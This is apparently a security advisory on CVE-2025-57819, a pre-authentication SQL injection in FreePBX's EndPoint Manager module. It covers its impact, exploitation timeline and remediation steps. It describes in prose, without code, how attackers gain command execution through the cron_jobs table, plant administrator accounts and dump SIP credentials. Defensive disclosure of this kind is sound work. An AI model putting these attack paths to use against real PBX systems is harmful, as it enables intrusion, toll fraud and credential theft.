CVE-2025-57819

What is Sangoma FreePBX?

Sangoma FreePBX is the world's most widely deployed open-source VoIP PBX (Private Branch Exchange) platform, powering business telephony systems for hundreds of thousands of organizations. FreePBX provides web-based administration of Asterisk-based phone systems, including call routing, voicemail, SIP trunk management, and endpoint configuration. The commercial EndPoint Manager (EPM) module extends FreePBX with centralized IP phone provisioning and management. FreePBX instances are valuable targets for attackers seeking to commit toll fraud (unauthorized international calls charged to the victim), intercept calls, harvest SIP credentials for resale, or use the PBX as a pivot point into internal networks.

Overview

CVE-2025-57819 is a critical SQL injection vulnerability (CWE-89) in FreePBX's commercial EndPoint Manager module that enables pre-authentication bypass and remote code execution. User-supplied input reaches SQL queries without sanitization, allowing an unauthenticated attacker to manipulate the database — creating rogue administrator accounts, injecting malicious cron jobs for OS command execution, or exfiltrating sensitive PBX configuration including SIP credentials. Over 12,000 FreePBX instances were publicly exposed at the time of exploitation. CISA added the vulnerability to the KEV catalog just one day after CVE publication, reflecting the severity and confirmed zero-day exploitation.

Affected Versions

Note: The vulnerability requires the commercial EndPoint Manager (EPM) module to be installed. FreePBX installations without EPM are not vulnerable to this specific CVE.

Technical Details

The vulnerability (CWE-89: Improper Neutralization of Special Elements Used in an SQL Command) is in the EndPoint Manager module's input handling. User-supplied parameters are passed directly to SQL queries without parameterization, escaping, or input validation. The vulnerable endpoint is reachable before authentication — EPM's handler processes the SQL query before any session check is performed.

A successful exploit chain enables three post-exploitation paths:

1. Cron-based RCE: Write malicious OS commands into the MySQL cron_jobs table; the system's cron daemon executes them on the next scheduled run.
2. Admin account creation: Insert a rogue administrator account into the FreePBX ampusers table, granting persistent web admin access.
3. Credential exfiltration: Dump the FreePBX database, including SIP trunk credentials, extension passwords, and voicemail PINs.

CVSS 9.8 — network accessible, no authentication, no user interaction required.

Discovery

Initially discovered through community reports: system administrators posted to FreePBX forums about broken installations and suspicious behavior in August 2025. Watchtowr Labs subsequently published a detailed technical analysis. IONIX and Horizon3.ai also published independent research.

Exploitation Context

Active exploitation confirmed starting 21 August 2025 — a zero-day, approximately one week before CVE assignment. At the time of exploitation, an estimated 12,000+ FreePBX instances were publicly accessible on the internet without IP filtering or access controls. CISA added CVE-2025-57819 to the KEV catalog on 29 August 2025 — one day after CVE publication — one of the fastest KEV additions on record, reflecting observed government-network targeting. No specific threat actor has been publicly attributed. The VoIP nature of the target suggests post-exploitation focused on toll fraud (unauthorized international calls), SIP credential harvesting for resale on criminal markets, and call interception for intelligence gathering.

Remediation

1. Upgrade EndPoint Manager immediately to the fixed version for your FreePBX branch: EPM 15.0.66 (FreePBX 15), 16.0.89 (FreePBX 16), or 17.0.3 (FreePBX 17). Update via the FreePBX Admin → Module Admin → Check Online.
2. Restrict FreePBX web admin access — the FreePBX administrative interface should never be directly internet-accessible. Apply firewall rules to limit access to trusted IP ranges (office IPs, VPN addresses). Use a VPN for remote administration.
3. Audit administrator accounts — review all accounts in FreePBX Admin → Admin → User Management for unauthorized additions. Remove any unrecognized accounts.
4. Review cron jobs on the FreePBX server: crontab -l and check /etc/cron* directories for unexpected entries.
5. Rotate all SIP credentials: change passwords for all SIP trunks, extensions, and voicemail PINs — these may have been exfiltrated during exploitation.
6. Check CDR (Call Detail Records) for unexpected international calls or unusual call patterns that may indicate toll fraud.
7. Enable FreePBX Firewall module (free) which enforces IP allowlisting for the web interface and blocks unauthenticated access to sensitive modules by default.